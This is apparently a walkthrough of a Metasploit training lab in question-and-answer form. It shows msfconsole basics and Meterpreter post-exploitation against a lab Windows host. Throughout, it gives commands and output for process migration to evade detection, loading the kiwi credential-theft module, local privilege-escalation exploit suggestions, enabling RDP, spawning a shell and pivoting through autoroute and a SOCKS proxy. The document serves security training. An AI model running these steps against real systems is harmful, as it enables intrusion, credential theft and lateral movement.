Metasploit, an open-source pentesting framework, is a powerful tool utilized by security engineers around the world.
Maintained by Rapid 7, Metasploit is a collection of not only thoroughly tested exploits but also auxiliary and post-exploitation tools.
Initializing
Initialize the database: msfdb init
To view the advance options we can trigger for starting the console: msfconsole -h
Start Metasploit using the command: msfconsole
To check whether we have connected to the database: db_status
We can start the Metasploit console on the command line without showing the banner or any startup information as well. What switch do we add to msfconsole to start it without showing this information? This will include the '-'
Answer: -q
Steps to Reproduce: By running msfconsole -h, we get to know that -q or --quiet option is used to start msfconsole withou banner.
Cool! We've connected to the database, which type of database does Metasploit 5 use?
Answer: postgresql
Steps to Reproduce:
msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
Commands
To view the help menu: help
The help menu has a very short one-character alias, what is it?
Answer: ?
Finding various modules we have at our disposal within Metasploit is one of the most common commands we will leverage in the framework. What is the base command we use for searching?
Answer: search
Once we've found the module we want to leverage, what command we use to select it as the active module?
Answer: use
How about if we want to view information about either a specific module or just the active one we have selected?
Answer: info
Metasploit has a built-in netcat-like function where we can make a quick connection with a host simply to verify that we can 'talk' to it. What command is this?
Answer: connect
Entirely one of the commands purely utilized for fun, what command displays the motd/ascii art we see when we start msfconsole (without -q flag)?
Answer: banner
Metasploit supports the use of global variables, something which is incredibly useful when you're specifically focusing on a single box. What command changes the value of a variable globally?
Answer: setg
Now that we've learned how to change the value of variables, how do we view them? \
Answer: get
How about changing the value of a variable to null/no value?
Answer: unset
What command can we use to set our console output to save to a file?
Answer: spool
What command can we use to store the settings/active datastores from Metasploit to a settings file? This will save within your msf4 (or msf5) directory and can be undone easily by simply removing the created settings file.
Answer: save
Modules for every occassion
Metasploit consists of six core modules that make up the bulk of the tools
Metasploit Filesystem
Data
Documentation
Lib
Modules
Auxiliary
Encoders
Exploits
Nops
Payloads
Post
Plugins
Scripts
Tools
Metasploit Libraries
Number of MSF libraries allow us to run oru exploits without writing additional code for rudimentary tasks.
REX - Handles sockets, protocols, text transformations.
MSF::CORE - provies the basic API
MSF::BASE - Provides friendly API
Metasploit modules
Exploits - Modules that use payloads
Auxiliary - Port scanners, fuzzers, sniffers, etc.
Payloads - consists of code that runs remotely
Encoders - ensure that payloads make it ot their destination intact
Nops - (No OPeration) keep the payload sizes consistent across exploit attempts.
Let's go ahead and move into the spool process or at least attempt to! What command do we use to transfer ourselves into the process? This won't work at the current time as we don't have sufficient privileges but we can still try!
Answer: migrate
Steps to Reproduce:
Note: The pid of spoolsv.exe is 1372
meterpreter > migrate 1372
[*] Migrating from 2284 to 1372...
[-] Error running command migrate: Rex::RuntimeError Cannot migrate into this process (insufficient privileges)
Reasons for migration
- Hiding the process to gain persistence and avoid detection.
- Change the process architecture to execute some payloads with the corrent architecture. For example, if there is a 64-bits system and our meterpreter process is 86-bits, some architecture-related problems could happen if we try to execute some exploits against the session gained.
- Migrate to a more stable process.
Well that migration didn't work, let's find out some more information about the system so we can try to elevate. What command can we run to find out more information regarding the current user running the process we are in?
Answer: getuid
Steps to Reproduce:
meterpreter > getuid
Server username: Dark-PC\Dark
How about finding more information out about the system itself?
Answer: sysinfo
Steps to Reproduce:
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?
Answer: load kiwi
Note: Latest version of mimikatz is called as kiwi. It is a post exploitation tool.
Let's go ahead and figure out the privileges of our current user, what command do we run?
Answer: getprivs
Steps to Reproduce:
Run help command.
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeChangeNotifyPrivilege
SeIncreaseWorkingSetPrivilege
SeShutdownPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
What command do we run to transfer files to our victim computer?
Answer: upload
How about if we want to run a Metasploit module?
Answer: run
A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?
Answer: ipconfig
Running post modules
To determine if we are in a VM.
meterpreter > run post/windows/gather/checkvm
[*] Checking if DARK-PC is a Virtual Machine ...
[+] This is a Xen Virtual Machine
To check for various exploit for privilege escalation.
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.232.195 - Collecting local exploits for x86/windows...
[*] 10.10.232.195 - 37 exploit checks are being tried...
[+] 10.10.232.195 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
nil versions are discouraged and will be deprecated in Rubygems 4
[+] 10.10.232.195 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.232.195 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
To try forcing RDP to be available. (In this machine, we don't have the privileges yet.)
meterpreter > run post/windows/manage/enable_rdp
[-] Insufficient privileges, Remote Desktop Service was not modified
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20210225193747_default_10.10.232.195_host.windows.cle_798590.txt
One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?
Answer: shell
Steps to Reproduce:
meterpreter > shell
Process 2232 created.
Channel 4 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Program Files (x86)\Icecast2 Win32>
Makin' Cisco proud
What command do we run to add a route to the following subnet: 172.18.1.0/24? Use the -n flag in your answer.
Answer: run autoroute -s 172.18.1.0 -n 255.255.255.0
Steps to Reproduce:
Subnet mask of /24 -> 255.255.255.0
meterpreter > run autoroute -h
[*] Usage: run autoroute [-r] -s subnet -n netmask
[*] Examples:
[*] run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0
[*] run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0
[*] run autoroute -s 10.10.10.1/24 # CIDR notation is also okay
[*] run autoroute -p # Print active routing table
[*] run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route
[*] Use the "route" and "ipconfig" Meterpreter commands to learn about available routes
meterpreter > run autoroute -s 172.18.1.0 -n 255.255.255.0
[*] Adding a route to 172.18.1.0/255.255.255.0...
[+] Added route to 172.18.1.0/255.255.255.0 via 10.10.232.195
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table
====================
Subnet Netmask Gateway
------ ------- -------
10.10.0.0 255.255.0.0 Session 2
172.18.1.0 255.255.255.0 Session 2
Additionally, we can start a socks5 proxy server out of this session. Background our current meterpreter session and run the command search server/socks5. What is the full path to the socks5 auxiliary module?
Answer: auxiliary/server/socks5
Steps to Reproduce:
Updates in latest version of msfconsole
msf6 exploit(windows/http/icecast_header) > search socks5
[-] No results from search
msf6 exploit(windows/http/icecast_header) > search socks
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/sockso_traversal 2012-03-14 normal No Sockso Music Host Server 1.5 Directory Traversal
1 auxiliary/server/socks_proxy normal No SOCKS Proxy Server
2 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection
Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server. What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?
Answer: proxychains
Note:
By adding proxychains before our command, we can run them through our socks5 server.